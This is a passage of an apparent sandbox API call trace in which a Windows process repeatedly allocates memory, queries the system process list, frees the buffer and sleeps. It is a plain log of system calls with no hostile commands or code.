BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.658] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.659] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.659] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.664] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.664] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.669] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.673] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.685] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.685] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.685] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.688] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.689] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.701] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.704] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.718] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.718] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.721] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.722] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.731] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.752] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.753] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.753] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.753] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.755] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.756] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.763] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.766] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.778] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.782] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.794] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.794] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.795] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.797] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.798] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.837] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.837] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.839] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.839] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.842] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.844] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.857] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.857] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.857] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.860] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.874] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.874] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.877] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.888] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.892] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.906] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.907] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.949] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.950] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.965] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.969] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0128.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0128.984] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0128.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0128.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0128.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0128.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0128.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.001] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.001] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.014] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.017] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0129.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0129.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0129.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0129.034] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0129.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0129.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0129.044] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 